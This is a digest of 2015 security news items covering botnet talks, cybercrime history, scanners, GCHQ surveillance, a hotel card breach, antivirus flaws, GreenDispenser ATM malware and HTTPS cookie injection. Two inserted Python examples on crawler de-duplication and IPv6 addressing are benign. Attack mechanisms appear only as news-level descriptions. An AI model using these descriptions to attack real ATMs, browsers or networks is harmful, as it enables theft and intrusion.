Recently, we have released a comprehensive whitepaper with details on our findings. The presentation will supplement a summary of key points already made public with our most recent discoveries, as well as possible links to other malware families and APT groups.
At the same time, ESET’s Lysa Myers and Stephen Cobb start their talk on Personnel shortage and diversity in IT: Is it truly a problem?
Thursday 1 October 14:00 – 15:30, Small Talk.

We’ve all heard horror stories about how little diversity there is in the greater tech field, as well as in InfoSec in particular, a phenomenon often apparent at industry events. But how does our current situation compare with the past? And what can (or should) we do to change that? Is there truly a shortage of candidates for employment in security jobs and, if so, can greater diversity help solve that problem?
This presentation looks at multiple aspects of the diversity in tech problem, assessing what has been, and what might be done in the future. For example, we examine trends over time to determine patterns, and look at cyber security job listings to compare them with those in the broader tech industry to see if this provides clues to solving the problem.
Efforts are underway to change the composition of the security industry, making it more inclusive, and this paper provides a look at existing groups and initiatives that focus on supporting minorities in tech and InfoSec careers. We will also offer resources for those seeking to provide mentorship opportunities for students and others seeking to enter this industry.
[Lysa offers a taste of what the talk will cover in a recent blog: Virus Bulletin small talk: Diversity in tech.]
And finally, Olivier Bilodeau presents Linux/Moose endangered or extinct? An update on this atypical embedded Linux botnet
Thursday 1 October 14:30 – 15:00, Green room.

Embedded Linux platforms have been increasingly targeted by malware authors over the past few years. The targeted devices, labelled under the umbrella term ‘Internet of Things’, are generally consumer routers, gateways or modems. They are compromised remotely via brute-forcing of their credentials or through an unpatched vulnerability, such as the infamous Shellshock. Most of these compromises result in the targeted system being assimilated into a botnet.
Recently active examples of embedded Linux botnets include Linux/Aidra, Linux/Dofloo (AES.DDoS), Linux/DNSAmp (Mr.Black), Linux.Gafgyt, Linux/Moose and Linux/Tsunami. Due to the availability of malware source code, several disjoint botnets co-exist; they target several architectures including ARM, MIPS and x86, with variants (or forks) of the threats being common. Of the aforementioned malware list, only Linux/Moose stands out as being one of the rare threats not in the DDoS business, with no x86 variant found and controlled by a single group of actors.
Linux/Moose is built with SOCKS and HTTP proxying capabilities as well as a generic packet sniffer with an exfiltration mechanism. It is used by its operators to commit follow, like and view fraud on social networking sites such as Facebook, Instagram, Twitter and YouTube. It has the ability to spread on its own with a little assistance from its C&C server to provide binaries specific to the victim’s architecture. It targets ARM and MIPS architectures with the latter targeted in both big- and little-endian variants. Additionally, the malware has code to pivot past firewalls and perform NAT traversal to allow attackers to operate from within firewalled networks.
This talk will first describe some of the challenges of reverse engineering and analysing embedded malware. Then we will cover Linux/Moose and the way it was operated. Expanding on the paper we released last spring about this threat, we will give an update on the current status of the botnet and the various means we are using to find its next evolution. To conclude, we will draw some conclusions on whether our publication successfully scared the operators and killed the threat or not.

Cybercrime: This is where it began!

28.9.2015 Crime
It may seem odd, but the year 1820 is given as the birth date of “computer crime”. After all, primitive (by today’s standards, of course) calculating machines existed as early as 3,500 BC in India, Japan and China.

In 1820, however, angry workers in France destroyed Joseph-Marie Jacquard’s loom: he had fitted it with an automatic device that allowed certain simple steps to be repeated. The workers feared the automaton would take their jobs.

That year is more of a curiosity than the true starting date of cyber attacks. Much closer is 1971, when American Vietnam veteran John Draper discovered that the toy whistle given away in boxes of Cap’n Crunch cereal could produce a tone at a frequency of 2,600 Hz.

What is so “criminal” about that? American telephone exchanges used exactly this tone to communicate with each other: with a whistle worth a few cents, blowing into the handset could switch a local (free) call to a long-distance (paid) one without billing ever starting.

It is said that in some parts of the USA up to a quarter of calls were made with the help of this whistle.

Computers enter the scene

We only had to wait two years for the first real crime committed with the help of a computer: using the computer he operated and his knowledge of the bank’s processes, a clerk managed to transfer 1.5 million dollars to his own account (roughly six times that at today’s prices).

Dime Savings Bank never noticed anything, and the clerk was arrested only after the police began investigating illegal gambling and started asking how he could afford such high bets on his income.

This case, however, was handled as classic embezzlement; the computer was merely a tool. It was not until 1981 that a crime committed entirely on a computer came along, when one Ian Murphy remotely altered the tariff calculation algorithm in the computers of the telecom company AT&T, which then charged reduced rates even at peak times.

Computers at that time were not protected in any way, so crimes sprang up like mushrooms after rain. Just a year after this modification they reached such proportions in the USA that they could not be handled within existing competences and legislation, and responsibility had to be transferred to the US Secret Service.

In 1988, First National Bank of Chicago fell victim to a computer attack in which 70 million dollars were electronically transferred out of the bank. Of that, 50 million was later traced. Four people, including one bank employee, were convicted of complicity. It is believed, however, that the group was much larger.

In 1993, hacker Kevin Poulsen and his friends managed, with a simple attack, to block almost all telephone calls to the Los Angeles radio station Kiis.

“Almost” means they left only their own lines open. As a result they won (as the only callers) two Porsche cars, several holidays and a 20,000 dollar prize in the station’s contests.

Poulsen was sentenced to five years. In media interviews he claimed it was mainly revenge by the federal authorities, because wiretapping of telephones by American intelligence services at the embassies of China, Israel and South Africa had been uncovered.

The golden era of hacking

The 1990s generally became the golden era of cybercrime: companies were switching to computer systems en masse, but nobody really knew how to secure them.

Cases therefore multiplied one after another: for instance, a group of attackers around the Russian hacker Vladimir Levin stole 10 million dollars from Citibank (1995) and managed to withdraw it within a few hours from banks in Finland and Israel.

Twenty years ago, a transfer completed within hours was an incredibly fast affair. This time, however, the police acted very briskly, and almost all the money was secured, except for just under half a million.

The year 2000 brought a large-scale renaissance of the classic crime of extortion. Once again the trail led to Russia, from where a certain group downloaded personal data, including credit card numbers, from the music retailer Universe. It then demanded 100,000 dollars not to publish the data. The retailer refused and the attackers carried out their threat.

The damage to the company’s reputation was so severe that it paid security expert Barry Schlossberg 1.4 million dollars to help track down the Russian attackers, lure them to the USA and hand them over to the police there.

This was done with the help of the FBI, which set up a fake security start-up in Seattle and offered attractive jobs to those it needed to get onto US soil. It repeated the procedure several times in other cases before the tactic was exposed.

E-mail abused

The first attempts to make significant use of e-mails, and of the worms placed in them, for fraud also date to the “magic” year 2000. The first attempts had taken place a year earlier, but those were still timid steps.

In 2000, a variant of the Iloveyou worm attempted to steal login credentials for the Internet banking of United Bank of Switzerland.

At roughly the same time, phishing scams also spread significantly; they had begun in the second half of the 1990s, but back then attackers only obtained information from AOL customers, at whose expense they then purchased various services. The growth of Internet banking changed that.

The FBI’s report for 2005 then simply states, tersely, that the global revenues from cybercrime exceeded those of the drug trade.

Cisco released a tool to scan for SYNful_Knock implants

Talos has developed a Python script for customers to scan their own network to identify routers that may have been compromised by the SYNful_Knock hack.
A couple of weeks ago I published the news of the SYNful_knock security issue involving CISCO routers.

CISCO issued an alert to warn enterprise customers about a spike in attacks in which hackers use valid admin credentials on IOS devices to install bogus ROMMON images; ROMMON is the bootstrap program that initializes the Cisco hardware and boots the software. A few days ago, security experts at Mandiant confirmed that they had detected such “implants” in the wild: the researchers found the malicious ROMMON images, dubbed “SYNful_Knock,” on 14 Cisco routers located in Ukraine, the Philippines, India and Mexico. The Cisco models 1841, 2811 and 3825 are affected; it is important to highlight that they are no longer on the market.

Now Cisco has decided to provide a free tool, dubbed SYNful_knock scanner, to allow administrators to test whether their routers are running bogus firmware implanted through the “SYNful_knock” hack.

Administrators need Python 2.7 and the scapy 2.3.1 packet manipulation library in order to launch the tool.

The Cisco Talos security group analyzed the malicious implants that infected a number of its customers and developed a tool to scan a network searching for compromised routers.

“Talos has now developed a tool for customers to scan their own network to identify routers that may have been compromised by this specific malware.” explained William McVey of the Talos Group.
The tool developed by Cisco is able to detect only the currently known version of the malicious implants.

“This tool can only detect hosts responding to the malware ‘knock’ as it is known at a particular point in time … it cannot establish that a network does not have malware that might have evolved to use a different set of signatures.”


Aerospace Probes released to stratosphere for spying weapons

September 27, 2015 By Pierluigi Paganini

A group of hackers is launching aerospace probes in the aim of spying on governments and organizations by collecting signals in the stratosphere.
A group of techies has recently created and tested an aerospace probe to help gather large amounts of data derived from communications, leading to a whole new concept of how we can spy on governments and their weapons. The Critical Engineering group has made its goal public, offering hope to people who have been worried sick about governments and other organizations spying on them without any option of returning the favor.

The aerospace probe is called the Deep Sweep and it will be used to scan the signals between the ground and the stratosphere. In this way, signals that would otherwise remain out of reach can be gathered and put to use by the probe’s operators. Further information on this project, in the techies’ own words, is available in their write-up of the breakthrough.


“The three members of a socially motivated movement of technologists known as Critical Engineering have developed and begun testing an “aerospace probe” they call the Deep Sweep. The invention, described in their own detailed writeup, is a 1-foot-diameter acrylic orb packed with radio equipment and attached to a 8.2-foot diameter helium-filled weather balloon.” reported a blog post published by Wired.


This is going to be low cost, as well – you can understand why the cost is a definitive factor, to say the least! The whole process of setting up the probe did not exceed $300 and, therefore it is an approachable expense and an investment that is going to attract the interest of many people out there. Using things like radios, antennas, SIM cards and insulated batteries, they have managed to put up something extraordinary.

Up till now, two major launches have taken place and the probe has succeeded partially in its goal.


Even though this is certainly an optimistic project and the details are yet to be determined for making it a well-integrated solution, hopefully this gadget is going to help monitor governmental conversations and things like that – offering the same results as those emerging from high-cost gadgets and procedures followed by agencies in the government.

As an innovative idea, the Deep Sweep could prove extremely helpful. In the near future, even more sophisticated gadgets may come to light. So we ought to take the aerospace probe with a pinch of salt, but always with gratitude for its inspirational aim!

Yahoo! Launches Free Web Application Security Scanner

Yahoo! has open-sourced Gryffin – a Web Application Security Scanner – in an aim to improve the safety of the Web for everyone.
Currently in beta, Project Gryffin has been made available on GitHub under the BSD-style license that Yahoo! has been using for a number of its open-sourced projects.
Gryffin is basically a Go & JavaScript platform that helps system administrators scan URLs for malicious web content and common security vulnerabilities, including SQL Injection and Cross-Site Scripting (XSS).
Yahoo! describes Gryffin as a large-scale Web security scanning platform, which is more than just a scanner, as it is designed to address two specific problems: scale and coverage.
Scale is obviously implied for the large Web, while coverage has two dimensions – crawl and fuzzing.
Crawl's job is to find as much of the Web application's footprint as possible, whereas fuzzing involves testing each of the application's components for an applied set of vulnerabilities.
Gryffin's crawler is designed to cope with "millions of URLs" that might be driven by a single template, needing only one of those URLs to work from.
Moreover, the crawler also includes a de-duplication engine for comparing a new page with an existing one and thus allowing it to avoid crawling the same page twice.
Gryffin's crawler also uses PhantomJS, which handles DOM rendering in client-side JavaScript applications.
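An added example of the de-duplication idea in Python (Gryffin itself is written in Go, and this is not its code): two pages generated by the same template share the same DOM tag structure, so a fingerprint over the tag sequence flags the second one as a duplicate even though the text and links differ, while a page with a different structure is crawled as new. The fingerprint method (a simhash over overlapping tag n-grams), the distance threshold, the sample pages and the shop.example URLs are all assumptions made for this example, not details of Gryffin's implementation.

```python
"""Structural page de-duplication for a crawler (added example, not Gryffin's code)."""
import hashlib
from html.parser import HTMLParser


class _TagSequence(HTMLParser):
    """Collect the sequence of start/end tags, ignoring text and attribute values."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_endtag(self, tag):
        self.tags.append("/" + tag)


def tag_shingles(html, k=3):
    """Split the page's tag sequence into overlapping k-grams (the fingerprint features)."""
    parser = _TagSequence()
    parser.feed(html)
    tags = parser.tags
    if len(tags) <= k:
        return [" ".join(tags)]
    return [" ".join(tags[i:i + k]) for i in range(len(tags) - k + 1)]


def simhash(features, bits=64):
    """Charikar-style similarity hash: near-identical feature sets give near-identical bits."""
    counts = [0] * bits
    for feature in features:
        digest = hashlib.sha256(feature.encode("utf-8")).digest()
        h = int.from_bytes(digest[:8], "big")
        for i in range(bits):
            counts[i] += 1 if (h >> i) & 1 else -1
    fingerprint = 0
    for i in range(bits):
        if counts[i] > 0:
            fingerprint |= 1 << i
    return fingerprint


def hamming_distance(a, b):
    """Number of differing bits between two fingerprints."""
    return bin(a ^ b).count("1")


class DedupIndex:
    """Remembers fingerprints of crawled pages and flags structurally equivalent ones."""

    def __init__(self, threshold=3):
        self.threshold = threshold   # max differing bits to still count as the same template
        self.seen = []               # list of (url, fingerprint)

    def fingerprint(self, html):
        return simhash(tag_shingles(html))

    def find_duplicate(self, html):
        """Return the URL of an already crawled page with the same structure, or None."""
        fp = self.fingerprint(html)
        for url, known in self.seen:
            if hamming_distance(fp, known) <= self.threshold:
                return url
        return None

    def add(self, url, html):
        self.seen.append((url, self.fingerprint(html)))


# Constructed sample pages; the shop URLs are placeholders.
PAGE_ITEM_1 = ("<html><body><div class='product'><h1>Blue mug</h1><p>EUR 4</p>"
               "<a href='/buy/1'>Buy</a></div></body></html>")
PAGE_ITEM_2 = ("<html><body><div class='product'><h1>Red mug</h1><p>EUR 5</p>"
               "<a href='/buy/2'>Buy</a></div></body></html>")
PAGE_LOGIN = ("<html><body><table><tr><td>Sign in</td></tr></table>"
              "<form><input name='user'></form></body></html>")

if __name__ == "__main__":
    index = DedupIndex()
    index.add("http://shop.example/item/1", PAGE_ITEM_1)
    print(index.find_duplicate(PAGE_ITEM_2))   # same template -> 'http://shop.example/item/1'
    print(index.find_duplicate(PAGE_LOGIN))    # different structure -> None
```

Two product pages from the same template yield identical fingerprints, so the crawler fuzzes that template once instead of once per product; the login page has an unrelated tag sequence and is indexed separately. The threshold trades coverage for speed: a larger one collapses more near-identical pages but risks skipping a page whose only structural difference is the injectable form.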
Gryffin's Requirements
The requirements for Gryffin are as listed below:
PhantomJS v2
The NSQ distributed messaging system
Sqlmap for fuzzing SQL injection
Arachni for fuzzing XSS and Web vulnerabilities
Kibana and Elastic Search for dashboarding
Besides Yahoo!, many major companies have released their own web application vulnerability scanners to make Internet experience safe for users.
Back in February, Google released its own free web application vulnerability scanner, dubbed Google Cloud Security Scanner, which scans developers' applications on its cloud platform for common security vulnerabilities.

Police Can't Force You To Unlock Your Phone, It violates Fifth Amendment Rights

Can the cops make you unlock your iPhone?
According to a recent Federal Court’s ruling, it is not okay for police to force suspects to unlock their phones with a passcode.
And, doing so would be a violation of your Fifth Amendment Rights in the US Constitution.
The ruling came as the conclusion of a case in which the Securities and Exchange Commission (SEC) accused Bonan Huang and Nan Huang of conducting illegal insider trading.
As a result, the investigating agencies cannot question the suspects to obtain their smartphone passcodes or any form of encryption password, or even to establish the existence of such passwords on the suspect's device.
The two are said to have used their positions as data analysts at Capital One Bank (a credit card issuing bank). The bank gave each of them a mobile phone, allowing them to use a passcode of their choice.
The Huangs left Capital One and returned the mobile phones to the bank; the bank then gave the phones, still locked with their passcodes, to the SEC.
Now the SEC, unable to unlock the devices, accuses them as follows:
Huangs’ conducted random non-public database searches of their employer and obtained aggregated sales data for the companies they searched; beyond their scope of work.
Huangs’ worked against their duties by using the non-public information for their personal gains.
Collectively, Huangs’ “Made profitable securities transactions on the basis of this material, non-public information in advance of the public release of quarterly sales announcements by these companies.”
Judge Kearney disagreed, though,
“Since the passcodes to Defendants’ work-issued smartphones are not corporate records, the act of producing their personal passcodes is testimonial in nature and Defendants properly invoke their Fifth Amendment privilege.”
The 5th amendment is more than 200 years old, who knew in that era that it would become useful like this; for criminal proceedings against the crimes done in the Cyberspace.
However, if there is evidence that supports the criminal charges against an accused, then he or she is not entitled to claim such privilege.
Also, if the accused admits to committing a cyber crime, hides it behind encryption, and then appeals to take the Fifth, he is not allowed that privilege.
The Fifth Amendment Says:
“No person shall be held to answer for a capital, or otherwise infamous crime, unless on a presentment or indictment of a Grand Jury, except in cases arising in the land or naval forces, or in the Militia, when in actual service in time of War or public danger; nor shall any person be subject for the same offence to be twice put in jeopardy of life or limb; nor shall be compelled in any criminal case to be a witness against himself, nor be deprived of life, liberty, or property, without due process of law; nor shall private property be taken for public use, without just compensation.”
So, who’s right?
But when the SEC is sure that the Huangs are the culprits, it can appeal to a higher court for a forensic examination of the mobile devices.
Although the Fifth Amendment says the suspects cannot be compelled to incriminate themselves, if a higher court orders a forensic investigation of the two devices issued to the Huangs, that investigation could reveal the truth.
Also, if the SEC fails to provide acceptable evidence supporting its accusations, then the court may not allow the forensic examination either.

Latest iOS 9.0.1 Update Failed to Patch Lockscreen Bypass Hack

iOS 9.0.1 – Apple's first update to its new iOS 9 mobile operating system – came out on Wednesday and addressed several bugs in its software.
Unfortunately, however, it seems that the latest update, iOS 9.0.1, doesn't fix the lock screen bypass vulnerability reported by iPhone user Jose Rodriguez.
Yes, the serious flaw in iOS 9 that allows anyone with physical access to your iPhone or iPad to bypass the device's lock screen and get into your contacts and personal photographs also works on iOS 9.0.1.
Video Demonstration:
Rodriguez published a new video giving a step-by-step explanation of how to bypass the passcode on iOS 9 and iOS 9.0.1 devices, using the benevolent nature of Apple's personal assistant Siri.

The lock screen bypass vulnerability works on all iOS versions from iOS 5.1.1 to the latest released iOS 9.0.1.
So, until Apple rolls out an update to patch this bug, the only way available to iPhone users to mitigate the issue is to disable Siri from being accessed from the lock screen.
To disable Siri on the lock screen, follow these simple steps:
Go to Settings
Select Touch ID & Passcode
Enter your passcode in the prompt
Look for "Allow access when locked" section and Disable Siri
The iOS lock screen bug is similar to the one fixed in the latest version of Android Lollipop. The Android lock screen bypass bug was far more complex than the current iOS bypass, and its impact was also worse.
The Android lock screen bypass gave attackers access to all important files as well as the ability to install malicious apps on the affected device.
However, it's been a bad week for Apple's iOS security with the discovery of nearly 4,000 malware-infected applications on the App Store.

uh-oh! North America Runs Completely Out of IPv4 Internet Addresses

Two months ago, THN reported a similar announcement made by the American Registry for Internet Numbers (ARIN), which said that the agency was no longer able to hand out IPv4 addresses in North America.
Within a few months, ARIN, which handles Internet addresses in America, has announced the final exhaustion of its free pool of IPv4 addresses: it has reached zero...
...i.e. no more IPv4 (Internet Protocol version 4) addresses are available.
Meanwhile, ARIN will still accept requests for IPv4 space, which can be satisfied in two ways:
Wait List for Unmet IPv4 Requests - Join the waitlist for unmet requests in the hopes that a block of the desired size will be available in the future.
IPv4 Transfer Market - Can be purchased from another organization that has more than it needs.
So, in the future, IPv4 address space will be allocated to the approved requests on the Waiting List for Unmet Requests, if ARIN:
receives any IPv4 address space from IANA (Internet Assigned Numbers Authority),
recovers from cancellations, or
returns from organizations.
They say, "The source entity (-ies within the ARIN Region (8.4)) will be ineligible to receive any further IPv4 address allocations or assignments from ARIN for a period of 12 months after a transfer approval, or until the exhaustion of ARIN's IPv4 space, whichever occurs first."
These changes will impact the organizations existing in Transfers between Specified Recipients within the ARIN Region (Transfer 8.3) and Inter-RIR Transfers to Specified Recipients (Transfer 8.4).
RIR refers to Regional Internet Registry, like ARIN, which is one of the RIRs.
Also, if they are successful in allotting IPv4 address pool to the waiting list entities and are still left with IPv4 addresses, then they will open the free pool for IPv4 addresses and add them there for future use.
We see this is just the start of an era (IPv6).
IPv6 was designed nearly two decades ago, in 1998, and it features much longer addresses, such as FE80:0000:0000:0000:0202:B3FF:FE1E:8329. This means that IPv6 offers a total pool of 340 Trillion Trillion Trillion addresses, providing capacity for the very long term.
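Operators moving to IPv6 after the exhaustion described above mostly hit notation and scoping questions first, so here is an added Python example (not from ARIN or THN) built on the standard ipaddress module: it canonicalises the address quoted in the text, shows that this particular address is link-local (never routed beyond one LAN segment, so it is not an example of globally usable space), and does the subnet arithmetic for an allocation. The 2001:db8::/32 prefix is the documentation range and 2001:4860:4860::8888 is a public resolver address; both are used only as sample inputs.

```python
"""IPv6 notation and scope checks (added example, not from the article or ARIN)."""
import ipaddress

IPV4_POOL = 2 ** 32    # 32-bit address space
IPV6_POOL = 2 ** 128   # 128-bit address space


def canonical(addr: str) -> str:
    """RFC 5952 text form: lower-case hex, leading zeros dropped, longest zero run as '::'."""
    return ipaddress.ip_address(addr).compressed


def expanded(addr: str) -> str:
    """Fully written-out form, useful when comparing addresses from logs field by field."""
    return ipaddress.ip_address(addr).exploded


def scope(addr: str) -> str:
    """Classify an address so a reader can tell a LAN-only address from a routable one."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 4:
        return "ipv4"
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:          # fe80::/10, valid on one link only; checked before is_private
        return "link-local"
    if ip.is_private:             # fc00::/7 unique-local plus documentation/reserved ranges
        return "unique-local-or-reserved"
    if ip.is_global:
        return "global"
    return "other"


def subnet_count(prefix: str, new_prefix: int) -> int:
    """How many /new_prefix subnets fit in the given allocation (e.g. /64s in a /48)."""
    net = ipaddress.ip_network(prefix, strict=True)
    if new_prefix < net.prefixlen:
        raise ValueError("new prefix must be at least as long as the allocation's")
    return 2 ** (new_prefix - net.prefixlen)


def pool_ratio() -> int:
    """IPv6 addresses available per IPv4 address."""
    return IPV6_POOL // IPV4_POOL


if __name__ == "__main__":
    sample = "FE80:0000:0000:0000:0202:B3FF:FE1E:8329"   # the address quoted in the text
    print(canonical(sample), scope(sample))               # fe80::202:b3ff:fe1e:8329 link-local
    print(scope("2001:4860:4860::8888"))                  # global
    print(subnet_count("2001:db8:abcd::/48", 64))          # 65536 /64 subnets in one /48
```

The scope check is the part worth keeping in a tooling library: a link-local address that leaks into an allow list or a log correlation never refers to a single machine across links, and Python's is_private also covers fe80::/10, which is why the example tests is_link_local first.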

Karma Police, how GCHQ tried to track every visible user on Internet

A new collection of GCHQ’s documents published by The Intercept reveals how the British Agency tried to track Web visits of “every visible user on Internet”
A new revelation made by The Intercept confirms that the UK Government Communications Headquarters (GCHQ) has conducted a massive online surveillance starting from the 2007.

The documents accessed by The Intercept detail an operation called “Karma Police”, carried out by the GCHQ, in which British intelligence tracked the online habits of people on a global scale.

KARMA POLICE is also the name of a popular song published in 1997 by the British band Radiohead, suggesting the spies may like it.

The intelligence agency described Karma Police as the “world’s biggest” Internet data-mining operation; the program was launched by the GCHQ in an attempt to track “every visible user on the Internet.”

The Karma Police aimed to track individuals listening to Internet streaming audio “radio stations” with the purpose of identifying any abuse of the radio instrument to spread messages among radicals.

“The power of KARMA POLICE was illustrated in 2009, when GCHQ launched a top-secret operation to collect intelligence about people using the Internet to listen to radio shows.” states The Intercept. “A summary report detailing the operation shows that one aim of the project was to research “potential misuse” of Internet radio stations to spread radical Islamic ideas.”

The Karma Police system collected in its Black Hole database the IP addresses of any individual visiting websites, as well as the associated cookies (referred to in the documents as “presence events” and “target detection identifiers”).

The Black Hole is considered the core of the GCHQ online spying operations; it is used to store raw logs of intercepted material before they are subjected to analysis.

Among the websites used to track users, there are Amazon, BBC, CNN, Facebook, Google, Microsoft Live, Reddit, Reuters, WordPress, Yahoo, YouTube, and YouPorn.

“To find out the identity of a person or persons behind an IP address, GCHQ analysts can enter the series of numbers into a separate system named MUTANT BROTH, which is used to sift through data contained in the Black Hole repository about vast amounts of tiny intercepted files known as cookies.”

Cookies are precious information for online marketing; their analysis allows advertisers to track users’ habits, and the same principle was exploited by the GCHQ in its surveillance program.

“Cookies are automatically placed on computers to identify and sometimes track people browsing the Internet, often for advertising purposes. When you visit or log into a website, a cookie is usually stored on your computer so that the site recognizes you. It can contain your username or email address, your IP address, and even details about your login password and the kind of Internet browser you are using — like Google Chrome or Mozilla Firefox.” continues The Intercept.
The agency tracked the users of “websites of interest” by correlating the cookies associated with their browsing sessions.

The British spies targeted streams that included Islamic religious content in an effort to identify the radicals’ Skype and social media accounts. By 2009, the Karma Police program allowed the GCHQ to store over 1.1 trillion “events”, a term used to refer to web browsing sessions. By 2010, the overall volume of collected data reached 30 billion records of Internet traffic metadata per day. According to another GCHQ document, by 2012 the volume had grown to 50 billion per day.

The analysis of the cookies allowed the GCHQ agents to discover when individuals were online and their location.

The GCHQ documents also revealed the arsenal the British intelligence agency used in the Karma Police operation. “Infinite Monkeys” was a tool used to track Web bulletin boards, while the “Samuel Pepys” tool was used to parse the content of Internet sessions and extract instant messages and e-mails.


Card Breach at Hilton Hotel Properties Under Investigation

Hilton Worldwide has issued an official statement informing its customers that the alleged data breach is currently under investigation.
As reported by Brian Krebs of Krebs on Security, several sources are claiming a compromise of Point-of-Sale (PoS) registers used by several businesses operating within a large number of Hilton Hotel and franchise properties across the United States.

These claims result from the correlation of data discovered throughout the duration of an unknown number of credit card fraud cases. The alleged common point-of-purchase for the cards being flagged as compromised was determined by five different banks, according to internal sources, to be one of several Hilton properties.

These properties include not only flagship Hilton locations but also the other Hilton brands: Embassy Suites, Doubletree, Hampton Inn and Suites, and Waldorf Astoria Hotels & Resorts.

In August of this year, Visa alerted several financial institutions to inform them that a breach had been discovered at a physical entity. Visa determined that the breach extended from April 21, 2015 to July 27, 2015.

The breached entities’ identity was not disclosed by Visa, as per their policy when distributing such alerts.

Hilton has issued an official statement that the alleged data breach is currently under investigation. The number of Hilton properties affected by this breach is currently unknown; however, Brian Krebs reports that several in-the-know sources have stated that this breach may have originated back as far as November 2014, and resultant nefarious activity may be ongoing.

In a statement to NBC News, a Hilton Worldwide spokesperson said it was aware of the report.

“Hilton Worldwide is strongly committed to protecting our customers’ credit card information. We have many systems in place and work with some of the top experts in the field to address data security. Unfortunately the possibility of fraudulent credit card activity is all too common for every company in today’s marketplace,” the statement said. “We take any potential issue very seriously, and we are looking into this matter.”

Antiviruses such as Kaspersky Antivirus can expose a computer to even greater threats

26.9.2015 Threats
Antivirus applications and similar security software are supposed to protect their users' devices. However, a growing body of research reveals that in some cases antivirus software can open a computer to threats it would otherwise not have to face.

The latest such example is the antivirus program of Kaspersky Lab. Google Project Zero researcher Tavis Ormandy recently analyzed its most widely used programs and quickly uncovered several easily exploitable bugs.

These could be used, for example, to execute malicious code remotely. Kaspersky has already fixed most of these flaws and is working intensively on fixing the rest. However, Ormandy published a post on his blog according to which Kaspersky is not the only player on the market with such critical flaws.

“We have strong evidence that an active black market trading in antivirus flaws exists,” Ormandy wrote. “Research shows that an easily accessible software attack surface dramatically increases the risk of attacks. It is therefore the duty of every antivirus vendor to adhere to the highest security standards and so minimize the damage caused by their software.”

Ormandy indicated that the flaws he found in Kaspersky products would most likely be exploited in very narrowly targeted attacks, similar to those the US National Security Agency (NSA) has carried out against terrorists or spies.

This means that for most people installing antivirus software is still worthwhile. Even so, his findings are troubling. They show that even the programs we rely on for our protection can harm us even more.

Kaspersky is not the only software vendor facing flaws in its products. Four critical flaws were also found this month in products sold by the security company FireEye. One of them allowed an attacker to obtain sensitive and protected data from the server on which the program was running. Ormandy has also uncovered serious holes in antivirus programs from Sophos and Eset.

“We would like to assure our clients and customers that the flaws uncovered by Google Project Zero team member Tavis Ormandy have already been fixed in all affected Kaspersky Lab products. Our specialists have found no evidence that these flaws were exploited in any way,” Kaspersky Lab spokespeople said in an official statement.

The company further confirmed that it will make several architectural changes to its products so that they can withstand attacks better in the future. These changes include, for example, implementing stack buffer overflow protection.

Further planned improvements should focus on mitigating the impact of flaws, for example implementing address space layout randomization (ASLR) or preventing the extraction of exposed data. After publishing his article, Ormandy also thanked Kaspersky Lab for its record-fast response.

The message is nevertheless clear. To function properly, antivirus software must be given highly privileged access to the computers it protects. That sensitive position can then easily be abused.

Ormandy recommended that antivirus developers build security sandboxes for their products that would isolate downloaded files from the core parts of the computer's operating system.

GreenDispenser is the latest ATM malware in the wild

The latest threat discovered by security experts at Proofpoint is “GreenDispenser,” a malware that shows many similarities with the Tyupkin malware.
The use of malicious code to hack ATMs is increasingly common in the criminal ecosystem; in the past, security experts have discovered several strains of malware designed with this intent.

ATM malware such as Tyupkin, Ploutus, PadPin and SUCEFUL are a few samples of this kind of threat, which allowed criminals to steal cash directly from ATMs.

Installing GreenDispenser requires physical access to the targeted ATM; the attacker can then instruct the machine directly from the PIN pad and order it to dispense cash.

“GreenDispenser provides an attacker the ability to walk up to an infected ATM and drain its cash vault. When installed, GreenDispenser may display an ‘out of service’ message on the ATM — but attackers who enter the correct pin codes can then drain the ATM’s cash vault and erase GreenDispenser using a deep delete process, leaving little if any trace of how the ATM was robbed,” state the experts at Proofpoint.

Similar to other ATM malware, GreenDispenser uses XFS, the Extension for Financial Services DLL library (MSXFS.dll) specifically used by ATMs. The library provides a dedicated API for communicating with the ATM’s PIN pad and cash dispenser.

The experts highlighted that GreenDispenser represents an evolution of the Tyupkin ATM malware: the menu used to control the ATM is protected by a two-factor authentication (2FA) mechanism, and the malware is designed to operate only for a limited period of time.

According to Proofpoint, the first PIN is hardcoded, while the second code is obtained by decoding a QR code displayed on the screen. The researchers believe the criminals likely use a mobile app to decode the QR code and obtain the dynamic authentication code.

The GreenDispenser ATM malware attempts to obtain the names of the PIN pad and the cash dispenser by querying a specific registry location; if this fails, it tries the default names “Pinpad1” and “CurrencyDispener1.”

Once the fraudster is authenticated to the ATM, the machine displays a menu that is used to dispense money or uninstall the malware.

The GreenDispenser ATM malware checks the current date before running: it is designed to operate in 2015, and the month must be prior to September. The feature has been implemented to deactivate the malware and avoid detection.

The experts have no doubt that ATMs will continue to be a favoured instrument for crooks, who will keep improving their malicious code to avoid detection.

“ATM malware continues to evolve, with the addition of stealthier features and the ability to target ATM hardware from multiple vendors,” states Proofpoint.

Exploiting Browser Cookies to Bypass HTTPS and Steal Private Information

A newly discovered critical flaw in the implementation of web cookies by major browsers could open secured (HTTPS) browsing to man-in-the-middle attacks.
The US Computer Emergency Response Team (CERT) has revealed that all the main browser vendors have improperly implemented the RFC 6265 standard, also referred to as "Browser Cookies," allowing remote attackers to bypass the secure HTTPS protocol and reveal confidential private session data.
Cookies are small pieces of data sent from websites to web browsers; they contain various information used to identify users or to store information related to that particular website.
HTTPS Cookie Injection Vulnerability
Whenever a website you have visited wants to set a cookie in your browser, it passes a header named “Set-Cookie” with the cookie name, its value and some options, including the cookie's expiration time and the domain name for which it is valid.
It is also important to note that HTTP-based websites do not encrypt their headers in any way; to address this, websites set HTTPS cookies with the "secure" flag, which indicates that the cookie must only be sent (from browser to server) over a secure HTTPS connection.
However, the researchers found that some major web browsers accept cookies for HTTPS sites without verifying the source of those cookies (cookie forcing), allowing an attacker with a man-in-the-middle position on a plain-text HTTP browsing session to inject cookies that will then be used in secure HTTPS sessions.
In an unprotected browser, an attacker can set an HTTPS cookie masquerading as another site and override the real HTTPS cookie in such a way that even the user might not realise it is fake while looking through their cookie list.
This malicious HTTPS cookie is then controlled by the attacker, who is thus able to intercept and grab private session information.
The issue was first revealed at the 24th USENIX Security Symposium in Washington in August, when researchers presented a paper showing that cookie injection attacks are possible against major websites and popular open source applications, including Google, Amazon, eBay, Apple, Bank of America, BitBucket, China Construction Bank, China UnionPay, phpMyAdmin, and MediaWiki, among others.
